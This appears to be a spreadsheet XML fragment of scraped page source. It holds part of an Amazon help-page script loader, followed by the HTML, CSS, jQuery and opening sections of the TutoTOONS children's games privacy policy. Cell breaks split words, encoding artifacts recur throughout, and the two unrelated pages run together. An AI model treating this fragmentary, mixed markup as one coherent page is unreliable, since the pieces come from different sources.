  (window.AmazonUIPageJS ? AmazonUIPageJS :</t>
  </si>
  <si>
    <t>P).load.js('https://images-na.ssl-images-amazon.com/images/I/21NNowrN-gL.js?AUIClients/CSHelpSearchAutocompleteJS');
  (window.AmazonUIPageJS ? AmazonUIPageJS : P).load.js('https://images-na.ssl-images-amazon.com/images/I/31gBdE2ZkOL.js?AUIClients/CSHelpVideoPlayerJS');
  (window.AmazonUIPageJS ?</t>
  </si>
  <si>
    <t>AmazonUIPageJS : P).load.js('https://images-na.ssl-images-amazon.com/images/I/51sa7hlTtvL.js?AUIClients/CSHelpCommonJS');
  (window.AmazonUIPageJS ? AmazonUIPageJS :</t>
  </si>
  <si>
    <t>P).load.js('https://images-na.ssl-images-amazon.com/images/I/01sDFphgFkL.js?AUIClients/CSHelpHMDJS');
&lt;/script&gt;
&lt;script&gt;
    window. P &amp;&amp; P.register('sp.load.js');
    window. P.register('cf');
    window._contextEventModel={"customerId":"1","sessionId":"145-1534970-5860935","marketplaceId":"ATVPDKIKX0DER","locale":"en_US","timestamp":"2023-04-12T22:54:28.762Z","eventCategory":"PreContact","eventType":"HelpPageEvent","eventData":"{\"nodeId\":\"GX7NJQ4ZB8MHFRNJ\",\"nodeTitle\":\"Amazon.com Privacy Notice\",\"ancestorNodeTitles\":[\"Legal Policies\",\"Security and Privacy\",\"Help\"],\"ancestorNodeIds\":[\"GWFZQ8U37JV9AUT5\",\"GRFTMVHP4HXMESSP\",\"G508510\"]}","sushiEndpoint":"https://unagi.amazon.com/1/events/com.amazon.</t>
  </si>
  <si>
    <t>HorizonteHelpService. IAD.Prod.events"};
&lt;/script&gt;
        &lt;title dir="ltr"&gt;Amazon.com Privacy Notice - Amazon Customer Service&lt;/title&gt;
    &lt;link rel="canonical" href="https://www.amazon.com/gp/help/customer/display.html?nodeId=GX7NJQ4ZB8MHFRNJ"&gt;&lt;/link&gt;
&lt;script type="text/javascript"&gt;
    var csHelpOmnitureAccountName = 'acsus-prod';
    if (typeof csHelpOmniture === 'undefined') { csHelpOmniture = {}; }
    csHelpOmniture.setupHMDWidget = function() {
        if (window.</t>
  </si>
  <si>
    <t xml:space="preserve">P &amp;&amp; window. P.AUI_BUILD_DATE) {
            P.when("A").register("csHelpOmniture", function() {
                return {
                </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
_ x000D_
  &lt;head&gt;_x005F_x000D_
   &lt;meta charset="utf-8"&gt;_x005F_x000D_
   &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;_x005F_x000D_
   &lt;meta name="description" content="At TutoTOONS, we create games that cherish the childhood and let kids explore the world while playing what they love!"&gt;_x005F_x000D_
   &lt;meta name="keywords" content="kids games, educational kids games, beautifly designed games, free game making software, build games free, game design software, learn build games for kids, build games on ipad, iphone, create games"&gt;_x005F_x000D_
   &lt;meta name="theme-color" content="#265561"&gt;_x005F_x000D_
   &lt;meta name="google-site-verification" content="DT3O-ntDj2yDSJFHuCgpgj-KfRRRCBonkvVWsD0TB0o" /&gt;_x005F_x000D_
   &lt;!-- Facebook Meta Tags --&gt;_x005F_x000D_
   &lt;meta property="og:url" content="https://www.tutotoons.com"&gt;_x005F_x000D_
   &lt;meta property="og:type" content="website"&gt;_x005F_x000D_
   &lt;meta property="og:title" content="TutoTOONS Kids Games Studio &amp; Publisher - Official Website"&gt;_x005F_x000D_
   &lt;meta property="og:description" content="At TutoTOONS, we create games that cherish the childhood and let kids explore the world while playing what they love!"&gt;_x005F_x000D_
   &lt;meta property="og:image" content="https://www.tutotoons.com/assets/images/seo.jpg"&gt;_x005F_x000D_
   &lt;!--</t>
  </si>
  <si>
    <t>Twitter Meta Tags --&gt;_x005F_x000D_
   &lt;meta name="twitter:card" content="summary_large_image"&gt;_x005F_x000D_
   &lt;meta property="twitter:domain" content="tutotoons.com"&gt;_x005F_x000D_
   &lt;meta property="twitter:url" content="https://www.tutotoons.com"&gt;_x005F_x000D_
    &lt;meta name="twitter:title" content="TutoTOONS Kids Games Studio &amp; Publisher - Official Website"&gt;_x005F_x000D_
   &lt;meta name="twitter:description" content="At TutoTOONS, we create games that cherish the childhood and let kids explore the world while playing what they love!"&gt;_x005F_x000D_
   &lt;meta name="twitter:image" content="https://www.tutotoons.com/assets/images/seo.jpg"&gt;_x005F_x000D_
      &lt;title&gt;Privacy Policy - TutoTOONS.com&lt;/title&gt;_x005F_x000D_
   &lt;base href="https://tutotoons.com/"&gt;_x005F_x000D_
   &lt;link href="images/favicon.ico" rel="shortcut icon"&gt;_x005F_x000D_
   &lt;link href="images/favicon_32.ico" rel="icon" sizes="32x32"&gt;_x005F_x000D_
   &lt;!-- FONT--&gt;_x005F_x000D_
   &lt;link rel="preconnect" href="https://fonts.gstatic.com"&gt;_x005F_x000D_
   &lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340069"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340069"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</si>
  <si>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/tutoclub only! --&gt;_x005F_x000D_
_x005F_x000D_
  &lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body&gt;_x005F_x000D_
&lt;div id="wrapper"&gt;_x005F_x000D_
  &lt;header&gt;_x005F_x000D_
    &lt;div class="container"&gt;_x005F_x000D_
      &lt;div class="header__content"&gt;_x005F_x000D_
        &lt;a href="/" title="Home" class="header__logo"&gt;_x005F_x000D_
          &lt;img  src="assets/images/logo.svg" alt="tutotoons"&gt;_x005F_x000D_
        &lt;/a&gt;_x005F_x000D_
        &lt;ul id="menu"&gt;_x005F_x000D_
          &lt;li class="link regular"&gt;&lt;a class="" href=""&gt;Home&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="link regular"&gt;&lt;a class="" href="games/"&gt;Games&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="link regular"&gt;&lt;a class=" href-career" href="career/open_positions"&gt;Career&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="link regular"&gt;&lt;a class="" href="about/"&gt;About&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li class="link regular"&gt;&lt;a class="" href="tutoclub/"&gt;TutoClub&lt;span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;        &lt;/ul&gt;_x005F_x000D_
        &lt;button class="menu-btn" id="menu-btn"&gt;_x005F_x000D_
          &lt;div class="menu-btn__burger"&gt;_x005F_x000D_
            &lt;span class="menu-btn__burger__top"&gt;&lt;/span&gt;_x005F_x000D_
            &lt;span class="menu-btn__burger__middle"&gt;&lt;/span&gt;_x005F_x000D_
            &lt;span class="menu-btn__burger__bottom"&gt;&lt;/span&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/button&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
     &lt;/div&gt;      _x005F_x000D_
  &lt;/header&gt;_x005F_x000D_
_x005F_x000D_
&lt;main id="wrap" class="privacy_policy"&gt;_x005F_x000D_
&lt;script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/packages/bootstrap/dist/css/bootstrap.css"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/packages/simple-line-icons/css/simple-line-icons.css"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/css/frontend_styles.css?v=1.210" id="stylescss"&gt;_x005F_x000D_
_x005F_x000D_
&lt;style&gt;_x005F_x000D_
  p {_x005F_x000D_
    font-size: 13px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    line-height: 19px;_x005F_x000D_
    margin: 0;_x005F_x000D_
    color: #6b6b6b;_x005F_x000D_
    margin-block-start: 1em;_x005F_x000D_
    margin-block-end: 1em;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table,_x005F_x000D_
  table tr th,_x005F_x000D_
  table tr td {_x005F_x000D_
    text-align: left;_x005F_x000D_
    font-size: 14px ! important;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
    line-height: 18px;_x005F_x000D_
    line-height: 19px;_x005F_x000D_
    color: #6b6b6b_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table tr th {_x005F_x000D_
    font-weight: bold;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  thead {_x005F_x000D_
    border-bottom: solid 1px #000;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table {_x005F_x000D_
    margin-top: 30px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  ul {_x005F_x000D_
    margin-top: 10px;_x005F_x000D_
    font-size: 13px;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    color: #6b6b6b;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  section {_x005F_x000D_
    margin-bottom: 15px;_x005F_x000D_
    padding-bottom: 15px;_x005F_x000D_
    margin-top: 10px;_x005F_x000D_
    border-bottom: 1px solid #ccc;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  a.go_to {_x005F_x000D_
    display: block;_x005F_x000D_
    font-weight: 800;_x005F_x000D_
    font-size: 15px;_x005F_x000D_
    color: #000;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
    margin-bottom: 10px;_x005F_x000D_
    text-transform: uppercase;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  a.go_to:hover {_x005F_x000D_
    color: #a3a3a3;_x005F_x000D_
_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a.go_to.no-styling {_x005F_x000D_
    display: inline;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    font-size: 1em;_x005F_x000D_
    color: #4a98f0;_x005F_x000D_
    margin: 0;_x005F_x000D_
    text-transform: none;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .scroll_top {_x005F_x000D_
    position: fixed;_x005F_x000D_
    bottom: 20px;_x005F_x000D_
     right: 15px;_x005F_x000D_
    background-color: rgba(0, 0, 0, 0.46);_x005F_x000D_
    width: 50px;_x005F_x000D_
    height: 50px;_x005F_x000D_
    text-align: center;_x005F_x000D_
    color: #fff;_x005F_x000D_
    font-size: 35px;_x005F_x000D_
    border-radius: 10px;_x005F_x000D_
    z-index: 999;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  tr.no-bottom-border td {_x005F_x000D_
    border-top: none ! important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  section h2 {_x005F_x000D_
    text-align: center;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a.go_to {_x005F_x000D_
    color: #555;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy</t>
  </si>
  <si>
    <t>a.go_to:hover {_x005F_x000D_
    color: #bebebe;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a:hover {_x005F_x000D_
    color: #111;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .divider {_x005F_x000D_
    margin: 20px auto;_x005F_x000D_
    border-bottom: 1px solid #ececec;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids h2 {_x005F_x000D_
    font-size:</t>
  </si>
  <si>
    <t>3.5em;_x005F_x000D_
    text-align: center;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids {_x005F_x000D_
    font-size: 16px;_x005F_x000D_
    background: #ff86d3;_x005F_x000D_
    color: #fff ! important;_x005F_x000D_
    padding: 100px 20px 100px 20px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids .image-right img {_x005F_x000D_
    float: right;_x005F_x000D_
    height: 260px;_x005F_x000D_
    width: 400px;_x005F_x000D_
    margin: 0 0 10px</t>
  </si>
  <si>
    <t>10px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .bg-for-kids div,_x005F_x000D_
  .bg-for-kids div p {_x005F_x000D_
    color: #fff;_x005F_x000D_
    line-height: 1.8;_x005F_x000D_
    font-size: 16px ! important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  @media screen and (max-width: 800px) {_x005F_x000D_
    .bg-for-kids {_ x000D_
      padding: 40px 20px 40px</t>
  </si>
  <si>
    <t>20px;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .bg-for-kids h2 {_x005F_x000D_
      font-size: 2em;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .bg-for-kids .image-right img {_x005F_x000D_
      float: none;_x005F_x000D_
      display: block;_x005F_x000D_
      margin: auto;_x005F_x000D_
      max-width: 95% ! important;_x005F_x000D_
      height: initial !important;_x005F_x000D_
    }_x005F_x000D_
  }_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
  body {_x005F_x000D_
    font-family: 'Open Sans', sans-serif ! important;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .underline {_x005F_x000D_
    text-decoration: underline;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*  _ x000D_
    Accordion _x005F_x000D_
    CSS _x005F_x000D_
  */_x005F_x000D_
_x005F_x000D_
  .accordion {_x005F_x000D_
    background-color: #eee;_x005F_x000D_
    color: #444;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
    padding: 18px;_x005F_x000D_
    width: 100%;_x005F_x000D_
    border: none;_x005F_x000D_
    text-align: left;_x005F_x000D_
    outline: none;_x005F_x000D_
    font-size: 15px;_x005F_x000D_
    transition: 0.4s;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .active,_x005F_x000D_
  .accordion:hover {_x005F_x000D_
    background-color: #e2e2e2;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .accordion:after {_x005F_x000D_
    content: url("data:image/svg+xml;utf8,&lt;svg xmlns='http://www.w3.org/2000/svg' width='10' height='17' viewBox='0 0 10 15' fill='none'&gt;&lt;path d='M1.39726 0L10</t>
  </si>
  <si>
    <t>8.33333L1.39726 16.6667L0 15.3132L7.20548 8.33333L0 1.35351L1.39726 0Z' fill='%23636363'/&gt;&lt;/svg&gt;");_x005F_x000D_
    color: #777;_x005F_x000D_
    font-weight: bold;_x005F_x000D_
    float: right;_x005F_x000D_
    margin-left: 5px;_x005F_x000D_
    transition: transform .2s ease-in-out;_x005F_x000D_
  }_x005F_x000D_
_ x000D_
  .active:after {_x005F_x000D_
    transform: translateX(-5px) rotate(90deg);_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel {_x005F_x000D_
    margin-bottom: 0px;_x005F_x000D_
    padding: 0 18px;_x005F_x000D_
    background-color: white;_x005F_x000D_
    max-height: 0;_x005F_x000D_
    overflow: hidden;_x005F_x000D_
    transition: max-height 0.2s ease-out;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*_x005F_x000D_
    Two _x005F_x000D_
    Column_x005F_x000D_
    Layout_x005F_x000D_
  */_x005F_x000D_
_x005F_x000D_
  /* Create two equal columns that floats next to each other */_x005F_x000D_
  .column {_x005F_x000D_
    float: left;_x005F_x000D_
    padding: 10px;_x005F_x000D_
    height: max-content;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-20 {_x005F_x000D_
    width: 20%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-40 {_x005F_x000D_
    width:</t>
  </si>
  <si>
    <t>40%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-60 {_x005F_x000D_
    width: 60%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column-width-80 {_x005F_x000D_
    width: 80%;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .column,_x005F_x000D_
  .column-width-20,_x005F_x000D_
  .column-width-40,_x005F_x000D_
  .column-width-60,_x005F_x000D_
  .column-width-80 {_x005F_x000D_
    box-sizing: border-box;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /* Clear floats after the columns */_x005F_x000D_
  .row:after {_x005F_x000D_
    content: "";_x005F_x000D_
    display: table;_x005F_x000D_
    clear: both;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  / * Responsive layout - makes the two columns stack on top of each other instead of next to each other */_x005F_x000D_
  @media screen and (max-width: 600px) {_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
    .column-width-20,_x005F_x000D_
    .column-width-40,_x005F_x000D_
    .column-width-60,_x005F_x000D_
    .column-width-80 {_x005F_x000D_
      width: 100%;_x005F_x000D_
    }_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  /*_x005F_x000D_
     Various other CSS_x005F_x000D_
  */_x005F_x000D_
_ x000D_
  .panel ul {_x005F_x000D_
    list-style: unset;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel ul&gt;li {_x005F_x000D_
    margin-inline: 15px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .panel i {_x005F_x000D_
    font-style: italic;_x005F_x000D_
  }_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  /* ------------------------------------------------------ */_x005F_x000D_
  /</t>
  </si>
  <si>
    <t>* Detect distance from top and show scroll to top button */_x005F_x000D_
  /* ------------------------------------------------------ */_x005F_x000D_
  $(window).scroll(function() {_x005F_x000D_
    var mod = $(window).scrollTop();_x005F_x000D_
    var doc_height = $(window).height();_x005F_x000D_
    if (mod &gt; doc_height) {_x005F_x000D_
      $(".scroll_top").fadeIn();_x005F_x000D_
    } else {_x005F_x000D_
      $(".scroll_top").fadeOut();_x005F_x000D_
    }_x005F_x000D_
  });_x005F_x000D_
  /* ------------------------------------------------------ */_x005F_x000D_
  /*                   Scroll to top script                  */_x005F_x000D_
  /</t>
  </si>
  <si>
    <t>* ------------------------------------------------------ */_x005F_x000D_
  $(document).on("click", ".scroll_top", function() {_x005F_x000D_
    $('html, body').animate({_x005F_x000D_
      scrollTop: Math.ceil($("#wrap").offset().top - $("header").height() - 20)_x005F_x000D_
    }, 1000);_x005F_x000D_
  });_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;main&gt;_x005F_x000D_
  &lt;div style="display:none" class="scroll_top"&gt;&lt;em class="icon-arrow-up"&gt;&lt;/em&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
  &lt;div class="bg-for-kids"&gt;_x005F_x000D_
    &lt;h2&gt;Children’s Privacy Notice&lt;/h2&gt;_x005F_x000D_
    &lt;div class="container container-small image-right"&gt;_x005F_x000D_
      &lt;img src="/images/panda_final.png" alt="privacy_panda"&gt;_x005F_x000D_
      &lt;div&gt;_x005F_x000D_
        &lt;p&gt;Hello! This is where we keep our &lt;b&gt;Privacy Policy.&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We are devoted to creating fun mobile games that brighten up your day._x005F_x000D_
           We care about your safety online and want you to have the best time with our apps.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;When you play our games, we do not collect any of your personal information,_x005F_x000D_
          such data as your full name, address, email or phone number. &lt;/p&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We may collect general information, for example, the country you live in,_x005F_x000D_
          how much time you spend in our game, types of mobile devices you use and similar._x005F_x000D_
          This info is not associated with you, we are getting it as a big pile of impersonalised numbers._x005F_x000D_
           This information helps us better understand our audience and improve our games. &lt;/p&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>In our games, you may see ads. We have a dedicated ads quality team to sure that all ads are appropriate for children and that no personal information about your interactions with ads is collected.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; The rest of this document is a detailed information about our privacy practices._x005F_x000D_
          If you have any questions about your privacy or this Privacy policy,_x005F_x000D_
          you may always contact us at &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;&lt;b&gt;privacy@tutotoons.com&lt;/b&gt;&lt;/a&gt; for more information.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
  &lt;!--</t>
  </si>
  <si>
    <t>*************************************** --&gt;_x005F_x000D_
  &lt;!--                Policy page              --&gt;_x005F_x000D_
  &lt;!-- *************************************** --&gt;_x005F_x000D_
  &lt;section class="white bot_push privacy_policy"&gt;_x005F_x000D_
_x005F_x000D_
    &lt;div class="container container-small push_f_top bottom-space"&gt;_x005F_x000D_
      &lt;h1&gt;TUTOTOONS PRIVACY POLICY&lt;/h1&gt;_x005F_x000D_
      &lt;p&gt;Last Revised: 6th of April, 2023&lt;/p&gt;_x005F_x000D_
      &lt;section&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;At TutoTOONS&lt;/b&gt;, ("TutoTOONS", "we") we take privacy seriously and this this Privacy policy is designed to share what information we collect and how we use it._x005F_x000D_
          This Privacy Policy is in compliance with the US Children's Online Privacy Protection Act (COPPA) and the European General Data Protection Regulation (GDPR)._x005F_x000D_
          If you have questions about this Privacy Policy or wish to exercise your rights, please do not hesitate to contact us by email at &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;&lt;b&gt;privacy@tutotoons.com&lt;/b&gt;&lt;/a&gt;. &lt;/p&gt;_x005F_x000D_
      &lt;/section&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;WHO IS THE CONTROLLER OF YOUR PERSONAL DATA?&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;TutoTOONS Limited is a company with registered office in Kintail House, Beechwood Park, Inverness, Scotland, IV2 3BW.</t>
  </si>
  <si>
    <t>We are the Data Controller responsible for your Personal Data. &lt;/p&gt;_x005F_x000D_
_ x000D_
        &lt;p&gt;&lt;b&gt;Our contact details:&lt;/b&gt;&lt;br&gt;_x005F_x000D_
          TutoTOONS LIMITED&lt;br&gt;_x005F_x000D_
          Kintail House, Beechwood Park, Inverness, Scotland, IV2 3BW&lt;br&gt;_x005F_x000D_
          Phone:</t>
  </si>
  <si>
    <t>+37037300833&lt;br&gt;_x005F_x000D_
           Email: &lt;a class="underline" href="mailto:privacy@tutotoons.com"&gt;privacy@tutotoons.com&lt;/a&gt;&lt;br&gt;_x005F_x000D_
        &lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;PURPOSE OF THIS PRIVACY POLICY&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;While you visit our website at &lt;a class="underline" href="/"&gt;www.tutotoons.com&lt;/a&gt; or you play TutoTOONS games ("Services" or "Games"), we may collect information about you ("Personal Data")._x005F_x000D_
          By this Privacy Policy, we want to clearly and comprehensively explain what data we collect, how we use, disclose and transfer it.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;From time to time, we may change the terms of this Privacy Policy, so do not forget to read this Privacy Policy on a regular basis to understand how we use your Personal Data._x005F_x000D_
          If we make a material change to this policy, we will post a notice on our website prior to making the change. If we have your parent email address, we will contact you to let you know about the changes.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;PERSONAL DATA WE COLLECT&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;Note: You must update any mobile applications downloaded before 2018 May 25th&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;Personal data is any information that relates to an identifiable individual._x005F_x000D_
           When you you visit our website at &lt;a class="underline" href="/"&gt;www.tutotoons.com&lt;/a&gt; or you play TutoTOONS games ("Services" or "Games"), we may we may collect and process the following personal data about you: &lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Contact Information&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;You may provide us with your Contact Information, such as your phone number and email when you contact us with a question or request._x005F_x000D_
            &lt;p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Note:&lt;/b&gt; If a child under the age of 13 years old in the USA or under the age of 16 years old in the EU has contacted us through email, and we need to communicate with the child more than once to resolve the query, we will ask the child to provide us with the child's parent or guardian's email._x005F_x000D_
              Then we will send the parent or guardian a notice telling that his/her child has contacted us. If we do not obtain parental consent after a reasonable time from the date of the data collection, we will delete such data from our records.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Location Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We do not collect data about your exact location (address) in any case. We can collect data about your location, i.e. city or country._x005F_x000D_
               We collect this data automatically when you use our Services or play our Games.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Technical Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;We may collect such information as your IP address, advertising ID, and other technologies on the devices that you use in our Services or play our Games._x005F_x000D_
              </t>
  </si>
  <si>
    <t xml:space="preserve">We can also collect non-personal Technical Data about the mobile operating system, mobile browser type, screen resolution, device vendor, language._x005F_x000D_
              We collect this data automatically when you use our Services or play our Games.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Usage Data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt; We can collect statistics on how you use our Services or play our Games. This information does not contain information that will help us identify you._x005F_x000D_
              </t>
  </si>
  <si>
    <t>We need this information so that we can provide you with the Services, improve their quality, adapt them to your needs.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;Please note, if you decide to purchase the TutoTOONS games subscription, we may collect and use additional personal data as stated in section 7. TutoTOONS Subscription.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We are not collecting or storing any of your financial data as management of any payments is done by the respective platform you are using to download our apps from, such as iTunes, Google play, Amazon or others.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We do not collect and do not intend to collect "special categories of data", such as any information about health, race, religion, political opinions or philosophical beliefs, sexual beliefs or orientation, as well as any data that is not necessary for the provision of our services.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_ x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;HOW WE COLLECT PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;We use several methods to collect Personal Data:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Personal Data is provided directly by you&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;You provide us with your data when you contact us by email, social networks or phone, ask to answer your question.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_ x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;We collect Personal Data automatically&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;When you use our Services, e.g. visit our website, play our games, we can automatically collect technical information about your IP address, promotional identifiers, equipment, browsing actions and models you use, as well as statistics._x005F_x000D_
              </t>
  </si>
  <si>
